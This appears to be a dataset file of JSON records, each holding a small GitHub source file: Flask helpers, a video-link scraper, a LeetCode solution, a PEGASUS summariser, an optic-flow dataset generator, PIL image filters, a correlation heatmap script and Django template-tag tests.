+{"seq_id":"33035751096","text":"# 定义索引转换过滤器(如果使用装饰器的方法定义过滤器,这里先得使用current_app进行关联,init文件中也要声明这个装饰器,相比很麻烦)\nimport functools\n\nfrom flask import session, current_app, g\n\nfrom Info.models import User\n\n\ndef index_convert(index):\n index_dict = {\n 1: \"first\",\n 2: \"second\",\n 3: \"third\"\n }\n return index_dict.get(index, \"\")\n\n\n\n# 查询用户登陆状态\ndef user_login_data(f):\n @functools.wraps(f) # 可以让闭包函数wrapper使用指定函数f的函数信息(如函数名__name__,文档注释__doc__)\n def wrapper(*args, **kwargs):\n # 判断用户是否登陆\n user_id = session.get(\"user_id\")\n user = None # 当某些极端情况下,user_id没有值,这样从库里就取不出数据,但是模板渲染里仍要传值,这时需要相当于对user进行初始化\n if user_id:\n # 根据user_id查询用户模型\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n\n # user = user.to_dict() if user else None # 因为这里只是用于验证用户是否登陆,不需要对user里的取值进行格式化\n\n g.user = user # 让g变量记录查询出的用户数据\n\n # 再执行原有的功能\n return f(*args, **kwargs)\n\n return wrapper\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73613993707","text":"from bs4 import BeautifulSoup\nimport re\nfrom urllib.request import Request, urlopen\nimport youtube_dl\n\ndef getWSHlinks(page):\n req = Request(page, headers={'User-Agent': 'Mozilla/5.0'})\n html_page = urlopen(req).read()\n\n soup = BeautifulSoup(html_page, 'html.parser')\n\n soup.body.find_all(\"time\")\n\n\n results = soup.find_all('a', attrs={\"class\":\"video-box\"})\n\n hrefs = []\n for x in results:\n #print(x.get('href'))\n hrefs.append(x.get('href'))\n return hrefs\n\nweekLongVidRefs = getWSHlinks(\"https://worldstarhiphop.com/videos/\")\nweekLongVidRefs.extend(getWSHlinks(\"https://worldstarhiphop.com/videos/?start=2\"))\n\nydl_opts = {}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(weekLongVidRefs)\nprint(len(weekLongVidRefs))\n","repo_name":"human3rr/scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2469821788","text":"\"\"\"\n给你一个整数 n ,对于 0 <= i <= n 中的每个 i ,计算其二进制表示中 1 的个数 ,返回一个长度为 n + 1 的数组 ans 作为答案。\n\neg1:\n输入:n = 2\n输出:[0,1,1]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n\neg2:\n输入:n = 5\n输出:[0,1,1,2,1,2]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n3 --> 11\n4 --> 100\n5 --> 101\n\n\"\"\"\nfrom typing import Optional, List\n\n\nclass Solution:\n def countBits(self, n: int) -> List[int]:\n bits = [0]\n high_bit = 0\n for i in range(1, n + 1):\n # 如果是1bit数,更新high_bit\n if i & (i - 1) == 0:\n high_bit = i\n # i 比 i - high_bit 多一个1bit位\n bits.append(bits[i - high_bit] + 1)\n return bits\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.countBits(5))\n","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/比特位计数.py","file_name":"比特位计数.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"18868997744","text":"# imports\nimport json\nfrom transformers import PegasusForConditionalGeneration, PegasusTokenizer\nfrom argparse import ArgumentParser\nimport pytorch_lightning as pl\nimport torch\n\n\nclass PegasusLightning(pl.LightningModule):\n # Instantiate the model\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n # Do a forward pass through the model\n def forward(self, input_ids, **kwargs):\n return self.model(input_ids, **kwargs)\n\n def generate(self, text, eval_beams, early_stopping=True, max_len=64):\n ''' Function to generate text '''\n generated_ids = self.model.generate(\n text[\"input_ids\"],\n attention_mask=text[\"attention_mask\"],\n use_cache=True,\n num_beams=eval_beams,\n max_length=max_len,\n early_stopping=early_stopping,\n\n )\n return generated_ids\n\n def save_model(self, save_path):\n self.tokenizer.save_pretrained(save_path)\n self.model.save_pretrained(save_path)\n\n# -----------------------------------------------------------------------------------\n\n\ndef generate_(text, model_, tokenizer_):\n # Put the model on eval mode\n\n tokens = tokenizer_(text, padding='max_length',\n return_tensors=\"pt\", truncation=True, src_lang=\"de_DE\").to(\"cuda\")\n summary_ids = model_.generate_(\n tokens, eval_beams=4)\n with tokenizer_.as_target_tokenizer():\n output = ([tokenizer_.decode(g, skip_special_tokens=True,\n clean_up_tokenization_spaces=True, tgt_lang=\"de_DE\") for g in summary_ids])\n return output[0]\n\n\ndef summarize(text, model, tokenizer):\n output = generate_(text, model_=model, tokenizer_=tokenizer)\n return output\n\n\ndef array_to_string(array):\n text = \"\"\n for ele in array:\n text += ele + \" \"\n text = text.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n return text\n\n\ndef run(checkpoint_path, test_file, output_file, model_id):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"Device is set to {device}\")\n\n tokenizer = PegasusTokenizer.from_pretrained(\n model_id)\n\n pegasus_model = PegasusForConditionalGeneration.from_pretrained(\n model_id)\n\n model = PegasusLightning.load_from_checkpoint(\n checkpoint_path=checkpoint_path, strict=False, tokenizer=tokenizer, model=pegasus_model)\n\n model.to(torch.device('cuda'))\n model.eval()\n\n print(\"Starting GENERATION\")\n\n # ---------Variable to be set:\n file_path = test_file\n output_file_path = output_file\n # --------------------------\n file = open(file_path, \"r\", encoding=\"utf-8\")\n output = open(output_file_path, \"a\", encoding=\"utf-8\")\n lines = file.readlines()\n for i in range(len(lines)):\n data = json.loads(lines[i])\n result = summarize(array_to_string(\n data[\"source\"]), model=model, tokenizer=tokenizer)\n print(str(result))\n output.write(str(result) + \" \\n\")\n print(f\"Processed TLDR #{i} from total {len(lines)} TLDRs\")\n output.close()\n file.close()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n # Required parameters\n parser.add_argument(\"--checkpoint_path\", type=str,\n help=\"Path of the checkpoint file to be used.\")\n parser.add_argument(\"--test_file\", type=str,\n help=\"Path to the test file containing the documents.\")\n parser.add_argument(\"--output_file\", type=str,\n help=\"File to save generated summaries in.\")\n parser.add_argument(\"--model-id\", type=str, required=False, default=\"google/pegasus-large\",\n help=\"Exact PEGASUS model checkpoint from huggingface to initialize the model.\")\n\n args = parser.parse_args()\n run(args.checkpoint_path, 
args.test_file,\n args.output_file, args.model_id)\n","repo_name":"nfriedri/CLS-Platform","sub_path":"backend/scripts/pegasus_lightning_model.py","file_name":"pegasus_lightning_model.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"4132645126","text":"from .utils_model import *\nfrom torch.utils.data.dataset import Dataset\nfrom analysis.opticflow import ROFL, HyperFlow\n\n\n# noinspection PyUnresolvedReferences\nclass ROFLDS(Dataset):\n\tdef __init__(\n\t\t\tself,\n\t\t\tpath: str,\n\t\t\tmode: str,\n\t\t\tdevice: torch.device = None,\n\t):\n\t\t# category & n_obj\n\t\tsim = path.split('/')[-1].split('_')[0]\n\t\tself.category = sim[:-1]\n\t\tself.n_obj = int(sim[-1])\n\t\t# attributes\n\t\tself.attrs = np.load(\n\t\t\tpjoin(path, 'attrs.npy'),\n\t\t\tallow_pickle=True,\n\t\t).item()\n\t\tself.f = self.attrs.pop('f')\n\t\tself.f_aux = self.attrs.pop('f_aux')\n\t\t# mode = trn/vld/tst\n\t\tpath = pjoin(path, mode)\n\t\tkws = dict(mmap_mode='r')\n\t\t# generative factors\n\t\tself.g = np.load(pjoin(path, 'g.npy'), **kws)\n\t\tself.g_aux = np.load(pjoin(path, 'g_aux.npy'), **kws)\n\t\t# data & norm\n\t\tself.x = np.load(pjoin(path, 'x.npy'), **kws)\n\t\tself.norm = np.load(pjoin(path, 'norm.npy'), **kws)\n\t\tif device is not None:\n\t\t\tself.x = torch.tensor(\n\t\t\t\tdata=self.x,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\t\tself.norm = torch.tensor(\n\t\t\t\tdata=self.norm,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\tif self.category == 'obj':\n\t\t\tself.transform = _shift_mu\n\t\telse:\n\t\t\tself.transform = None\n\n\tdef __len__(self):\n\t\treturn len(self.x)\n\n\tdef __getitem__(self, i):\n\t\tif self.transform is not None:\n\t\t\tx = self.transform(self.x[i])\n\t\telse:\n\t\t\tx = self.x[i]\n\t\treturn x, self.norm[i]\n\n\ndef _shift_mu(x):\n\treturn x - torch.mean(x)\n\n\ndef generate_simulation(\n\t\tcategory: str,\n\t\tn_obj: int,\n\t\ttotal: int,\n\t\tkwargs: dict,\n\t\taccept_n: dict,\n\t\tmin_obj_size: int,\n\t\tdtype='float32', ):\n\tkws = kwargs.copy()\n\tkws['category'] = category\n\tkws['n_obj'] = n_obj\n\tkws['seed'] = 0\n\n\tshape = (total, kws['dim'], kws['dim'], 2)\n\talpha_dot = np.empty(shape, dtype=dtype)\n\tg_all, g_aux_all = [], []\n\n\tcnt = 0\n\twhile True:\n\t\t# generate\n\t\tof = ROFL(**kws).compute_coords()\n\t\t_ = of.compute_flow()\n\t\t# accept\n\t\taccept = of.filter(\n\t\t\tmin_obj_size=min_obj_size,\n\t\t\tmin_n_obj=accept_n[n_obj],\n\t\t)\n\t\tf, g, f_aux, g_aux = of.groundtruth_factors()\n\t\tind = range(cnt, min(cnt + accept.sum(), total))\n\t\talpha_dot[ind] = of.alpha_dot[accept][:len(ind)].astype(dtype)\n\t\tg_aux_all.append(g_aux[accept])\n\t\tg_all.append(g[accept])\n\t\tcnt += accept.sum()\n\t\tif cnt >= total:\n\t\t\tbreak\n\t\tkws['seed'] += 1\n\n\talpha_dot = np.transpose(alpha_dot, (0, -1, 1, 2))\n\tg_all, g_aux_all = cat_map([g_all, g_aux_all], axis=0)\n\tg_all, g_aux_all = g_all[:, :total], g_aux_all[:, :total]\n\n\tattrs = {\n\t\t'f': f,\n\t\t'f_aux': f_aux,\n\t\t'category': of.category,\n\t\t'n_obj': of.n_obj,\n\t\t'dim': of.dim,\n\t\t'fov': of.fov,\n\t\t'res': of.res,\n\t\t'z_bg': of.z_bg,\n\t\t'obj_r': of.obj_r,\n\t\t'obj_bound': of.obj_bound,\n\t\t'obj_zlim': of.obj_zlim,\n\t\t'vlim_obj': of.vlim_obj,\n\t\t'vlim_slf': of.vlim_slf,\n\t\t'residual': of.residual,\n\t\t'seeds': range(kws['seed'] + 1),\n\t}\n\treturn alpha_dot, g_all, g_aux_all, attrs\n\n\ndef save_simulation(\n\t\tsave_dir: str,\n\t\tx: np.ndarray,\n\t\tg: np.ndarray,\n\t\tg_aux: np.ndarray,\n\t\tattrs: dict,\n\t\tsplit: dict = None, ):\n\tn = len(x)\n\tname = '_'.join([\n\t\tf\"{attrs['category']}{attrs['n_obj']}\",\n\t\tf\"dim-{attrs['dim']}\",\n\t\tf\"n-{n//1000}k\",\n\t])\n\tpath = pjoin(save_dir, name)\n\tos.makedirs(path, 
exist_ok=True)\n\t# save attrs\n\tsave_obj(\n\t\tobj=attrs,\n\t\tsave_dir=path,\n\t\tfile_name='attrs',\n\t\tverbose=False,\n\t\tmode='npy',\n\t)\n\t# save data\n\tsplit = split if split else {\n\t\t'trn': int(0.8 * n),\n\t\t'vld': int(0.1 * n),\n\t\t'tst': int(0.1 * n),\n\t}\n\tassert sum(split.values()) == n\n\ti = 0\n\tsplit_ids = {}\n\tfor k, v in split.items():\n\t\tsplit_ids[k] = range(i, i + v)\n\t\ti += v\n\tfor a, b in itertools.combinations(split_ids.values(), 2):\n\t\tassert not set(a).intersection(b)\n\n\tfor lbl, ids in split_ids.items():\n\t\t_path = pjoin(path, lbl)\n\t\tos.makedirs(_path, exist_ok=True)\n\t\tkws = dict(\n\t\t\tsave_dir=_path,\n\t\t\tverbose=False,\n\t\t\tmode='npy',\n\t\t)\n\t\t# generative factors\n\t\tkws['obj'] = g[ids]\n\t\tkws['file_name'] = 'g'\n\t\tsave_obj(**kws)\n\t\t# generative factors (aux)\n\t\tkws['obj'] = g_aux[ids]\n\t\tkws['file_name'] = 'g_aux'\n\t\tsave_obj(**kws)\n\t\t# flow frames\n\t\tkws['obj'] = x[ids]\n\t\tkws['file_name'] = 'x'\n\t\tsave_obj(**kws)\n\t\t# norm\n\t\tkws['obj'] = np.sum(sp_lin.norm(\n\t\t\tx[ids], axis=1), axis=(1, 2))\n\t\tkws['file_name'] = 'norm'\n\t\tsave_obj(**kws)\n\treturn\n\n\ndef load_ephys(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict = None,\n\t\trescale: float = 2.0,\n\t\tdtype: str = 'float32', ):\n\tkws_hf = kws_hf if kws_hf else {\n\t\t'dim': 17, 'apply_mask': True}\n\tkws_hf['fov'] = group.attrs.get(\n\t\t'designsize', 30.0) / 2\n\tdiameter = np.array(group['hf_diameter'])\n\t# inconsistent diameters throughout the expt?\n\tif len(set(group.attrs.get('diameter'))) != 1:\n\t\tif 'hf_diameterR' in group:\n\t\t\tdiameter = np.concatenate([\n\t\t\t\tdiameter,\n\t\t\t\tnp.array(group['hf_diameterR']),\n\t\t\t])\n\t\tdiameter = diameter.mean()\n\t\tdiameter_r = diameter\n\telse:\n\t\tdiameter_r = None\n\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_params']),\n\t\tcenter=np.array(group['hf_center']),\n\t\tdiameter=diameter,\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow(dtype=dtype)\n\tspks = np.array(group['spks'], dtype=float)\n\tif 'badspks' in group:\n\t\tmask = ~np.array(group['badspks'], dtype=bool)\n\telse:\n\t\tmask = np.ones(len(spks), dtype=bool)\n\tstim_r, spks_r, good_r = setup_repeat_data(\n\t\tgroup=group,\n\t\tkws_hf=kws_hf,\n\t\tdiameter=diameter_r,\n\t)\n\n\tif rescale is not None:\n\t\tstim_scale = np.max(np.abs(stim))\n\t\tstim *= rescale / stim_scale\n\t\tif stim_r is not None:\n\t\t\tstim_r *= rescale / stim_scale\n\n\treturn stim, spks, mask, stim_r, spks_r, good_r\n\n\ndef setup_repeat_data(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict,\n\t\tdiameter: float = None, ):\n\tif not group.attrs.get('has_repeats'):\n\t\treturn None, None, None\n\n\tpsth = np.array(group['psth_raw_all'], dtype=float)\n\tbadspks = np.array(group['fix_lost_all'], dtype=bool)\n\ttstart = np.array(group['tind_start_all'], dtype=int)\n\tassert (tstart == tstart[0]).all()\n\ttstart = tstart[0]\n\tnc, _, length = psth.shape\n\tintvl = range(tstart[1], tstart[1] + length)\n\n\t# stim\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_paramsR']),\n\t\tcenter=np.array(group['hf_centerR']),\n\t\tdiameter=diameter if diameter else\n\t\tnp.array(group['hf_diameterR']),\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow()\n\tstim = stim[range(intvl.stop)]\n\tintvl = np.array(intvl)\n\n\t# spks\n\t_spks = np.array(group['spksR'], dtype=float)\n\tspks = np_nans(psth.shape)\n\tfor i in range(nc):\n\t\tfor trial, t in enumerate(tstart):\n\t\t\ts_ = range(t, t + length)\n\t\t\tspks[i][trial] = _spks[:, i][s_]\n\tspks[badspks] 
= np.nan\n\n\treturn stim, spks, intvl\n\n\ndef setup_supervised_data(\n\t\tlags: int,\n\t\tgood: np.ndarray,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray, ):\n\tassert len(stim) == len(spks), \"must have same nt\"\n\tidxs = good.copy()\n\tidxs = idxs[idxs > lags]\n\tsrc = time_embed(stim, lags, idxs)\n\ttgt = spks[idxs]\n\tassert len(src) == len(tgt), \"must have same length\"\n\treturn src, tgt\n\n\ndef time_embed(x, lags, idxs=None):\n\tassert len(x) > lags\n\tif idxs is None:\n\t\tidxs = range(lags, len(x))\n\tx_emb = []\n\tfor t in idxs:\n\t\tx_emb.append(np.expand_dims(\n\t\t\tx[t - lags: t], axis=0))\n\treturn np.concatenate(x_emb)\n\n\ndef simulation_combos():\n\tcombos = [('fixate', i) for i in [0, 1]]\n\tcombos += [('transl', i) for i in [0, 1]]\n\tcombos += [('obj', i) for i in [1]]\n\treturn combos\n\n\ndef _setup_args() -> argparse.Namespace:\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\n\t\t\"n_tot\",\n\t\thelp='# frames total',\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--n_batch\",\n\t\thelp='# frames per batch',\n\t\tdefault=int(5e4),\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--dim\",\n\t\thelp='dimensionality',\n\t\tdefault=33,\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--min_obj_size\",\n\t\thelp='minimum acceptable object size',\n\t\tdefault=10.5,\n\t\ttype=float,\n\t)\n\tparser.add_argument(\n\t\t\"--dtype\",\n\t\thelp='dtype for alpha_dot',\n\t\tdefault='float32',\n\t\ttype=str,\n\t)\n\treturn parser.parse_args()\n\n\ndef _main():\n\targs = _setup_args()\n\tprint(args)\n\n\tkws = dict(\n\t\tn=args.n_batch,\n\t\tdim=args.dim,\n\t\tfov=45.0,\n\t\tobj_r=0.25,\n\t\tobj_bound=1.0,\n\t\tobj_zlim=(0.5, 1.0),\n\t\tvlim_obj=(0.01, 1.0),\n\t\tvlim_slf=(0.01, 1.0),\n\t\tresidual=False,\n\t\tz_bg=1.0,\n\t\tseed=0,\n\t)\n\taccept_n = {\n\t\t0: None,\n\t\t1: None,\n\t\t2: 1,\n\t\t4: 3,\n\t\t8: 5,\n\t}\n\tsave_dir = '/home/hadi/Documents/MTVAE/data'\n\tcombos = simulation_combos()\n\tprint(f\"Simulation combos:\\n{combos}\")\n\tpbar = tqdm(combos)\n\tfor category, n_obj in pbar:\n\t\tpbar.set_description(f\"creating {category}{n_obj}\")\n\t\talpha_dot, g, g_aux, attrs = generate_simulation(\n\t\t\ttotal=args.n_tot,\n\t\t\tcategory=category,\n\t\t\tn_obj=n_obj,\n\t\t\tkwargs=kws,\n\t\t\taccept_n=accept_n,\n\t\t\tmin_obj_size=args.min_obj_size,\n\t\t\tdtype=args.dtype,\n\t\t)\n\t\tsave_simulation(\n\t\t\tsave_dir=save_dir,\n\t\t\tx=alpha_dot,\n\t\t\tg=g,\n\t\t\tg_aux=g_aux,\n\t\t\tattrs=attrs,\n\t\t)\n\tprint(f\"\\n[PROGRESS] saving datasets done ({now(True)}).\\n\")\n\treturn\n\n\nif __name__ == \"__main__\":\n\t_main()\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19962157329","text":"from plot_deconvolution import Lucy_Restoration\nfrom PIL import Image, ImageFilter, ImageOps\nfrom PIL.ImageFilter import (\n BLUR, CONTOUR, EDGE_ENHANCE, EDGE_ENHANCE_MORE,\n EMBOSS, FIND_EDGES, SHARPEN\n)\n\nimport numpy as np\n\ndef sharpenPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(SHARPEN)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef blurPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(BLUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef rotateCounter(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(90).save('image' + str(counter) + '.jpg')\n\n\ndef rotateClock(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(270).save('image' + str(counter) + '.jpg')\n\n\ndef cropPic(curImg, counter):\n current = Image.open(curImg)\n width, height = current.size\n left = width / 4\n top = height / 4\n right = 3 * width / 4\n bottom = 3 * height / 4\n newImg = current.crop((left, top, right, bottom))\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef sketchPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(CONTOUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef oilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef pencilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE_MORE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef foilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EMBOSS)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef negativePic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(FIND_EDGES)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef histogramEqualize(curImg, counter):\n current = Image.open(curImg)\n newImg = ImageOps.equalize(current, mask=None)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef LucyRestoration(curImg):\n current = Image.open(curImg)\n Lucy_Restoration(current)\n\ndef histogramEqualize_2(curImg, counter):\n current = Image.open(curImg)\n img_gray = current.convert(mode='L') # convert to grayscale\n img_array = np.asarray(img_gray) #convert to NumPy array\n\n histogram_array = np.bincount(img_array.flatten(), minlength=256) #flatten image array and calculate histogram via binning\n \n num_pixels = np.sum(histogram_array)\n histogram_array = histogram_array/num_pixels\n\n chistogram_array = np.cumsum(histogram_array)\n\n transform_map = np.floor(255 * chistogram_array).astype(np.uint8)\n\n img_list = list(img_array.flatten())\n\n eq_img_list = [transform_map[p] for p in img_list]\n\n eq_img_array = np.reshape(np.asarray(eq_img_list), img_array.shape)\n\n eq_img = Image.fromarray(eq_img_array, mode='L') #convert NumPy array to pillow Image and write to file\n eq_img.save('image' + str(counter) + '.jpg')","repo_name":"chungiee/CPE462_ImageProcessing","sub_path":"editFunctions.py","file_name":"editFunctions.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6906645829","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport pandas as pd\nimport sklearn.preprocessing as pre_processing\nimport random\nfrom collections import Counter, defaultdict\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn import metrics\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef max2(x):\n xp=x.copy()\n xp[xp == 1] = 0.002\n max=np.max(xp)\n return max\n\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nX = np.loadtxt('../数据集/[013]segment(0-1).txt')\nXp = pd.DataFrame(X[:,:-1])\n\nXp.rename(columns = {0: 'A1', 1: '', 2: 'A3', 3: '', 4: 'A5', 5: '', 6: 'A7', 7: '', 8: 'A9', 9: '',10: 'A11', 11: '', 12: 'A13', 13: '', 14: 'A15', 15: '', 16: 'A17', 17: '', 18: 'A19'},\n inplace = True)\n\n\nXp_corr=abs(Xp.corr())\nXp=np.array(Xp)\nmax=max2(Xp)\nprint(max)\nmin=np.min(Xp)\nprint(min)\n\n\nprint(Xp)\nsns.heatmap(Xp_corr, annot = False, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\nXp1=pd.DataFrame(X[:,[5,6,7,8]])\n\nXp1.rename(columns = {0: 'A6', 1: 'A7', 2: 'A8', 3: 'A9'},\n inplace = True)\n\n\nXp1=abs(Xp1.corr())\nXp2=pd.DataFrame(X[:,[9,10,11,12,14,16]])\n\nXp2.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17'},\n inplace = True)\n\n\nXp2=abs(Xp2.corr())\nsns.heatmap(Xp1, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\nsns.heatmap(Xp2,annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\nXp3=pd.DataFrame(X[:,[9,10,11,12,14,16,8]])\n\n\nXp3.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17',6:'A9'},\n inplace = True)\n\n\nXp3=abs(Xp3.corr())\nsns.heatmap(Xp3, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"属性分组的RVFL集成方法/相关性对比算法.py","file_name":"相关性对比算法.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"13514991284","text":"import os\nfrom unittest.mock import patch\n\nfrom django.http import HttpRequest\nfrom django.template import engines\nfrom django.test import SimpleTestCase, TestCase, override_settings\n\nfrom core.tests.templatetags.test_svg_icon import VALID_SVG\n\n\n@override_settings(\n STATICFILES_DIRS=[\n os.path.join(os.path.dirname(__file__), \"staticfiles\"),\n ]\n)\nclass SvgIconTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_jinja_tag(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"test\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"test\")\n def test_jinja_tag_fallback(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"missing\")\n def test_jinja_tag_fallback_not_found_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"missing\") }}')\n with self.assertRaises(FileNotFoundError):\n template.render()\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"invalid\")\n def test_jinja_tag_fallback_invalid_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n with self.assertRaises(ValueError):\n template.render()\n\n\n@override_settings(FLAGS={\"MY_FLAG\": [(\"boolean\", True)]})\nclass FeatureFlagTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_flag_enabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_enabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"True\")\n\n def test_flag_disabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_disabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"False\")\n\n\nclass SlugifyUniqueTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n self.template = '{{ \"Some text\" | slugify_unique }}'\n\n def render(self, template, context=None):\n return self.engine.from_string(template).render(context=context)\n\n def test_no_context(self):\n self.assertEqual(self.render(self.template), \"some-text\")\n\n def test_no_request_in_context(self):\n self.assertEqual(self.render(self.template, {}), \"some-text\")\n\n def test_render_with_request_in_context(self):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}), \"some-text\"\n )\n\n def test_render_uses_request_to_make_multiple_unique_slugs(self):\n request = HttpRequest()\n template = \" and \".join([self.template, self.template])\n self.assertEqual(\n self.render(template, {\"request\": request}),\n \"some-text and some-text-1\",\n )\n\n def test_render_without_request_repeats_slugs(self):\n template = \" and \".join([self.template, self.template])\n self.assertEqual(self.render(template), \"some-text and some-text\")\n\n def test_multiple_renders_multiple_unique_slugs(self):\n request = HttpRequest()\n rendered = [\n self.render(self.template, {\"request\": request}) for _ in range(5)\n ]\n\n self.assertEqual(\n rendered,\n [\n \"some-text\",\n \"some-text-1\",\n \"some-text-2\",\n \"some-text-3\",\n \"some-text-4\",\n ],\n )\n\n def test_different_requests_allow_repeats(self):\n for _ in range(5):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}),\n \"some-text\",\n )\n\n\nclass 
LanguageTagTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n\n def render(self, template):\n return self.engine.from_string(template).render()\n\n def test_english_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'en' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"English\",\n )\n\n def test_spanish_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'es' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"Inglés\",\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/core/tests/test_jinja2tags.py","file_name":"test_jinja2tags.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"}
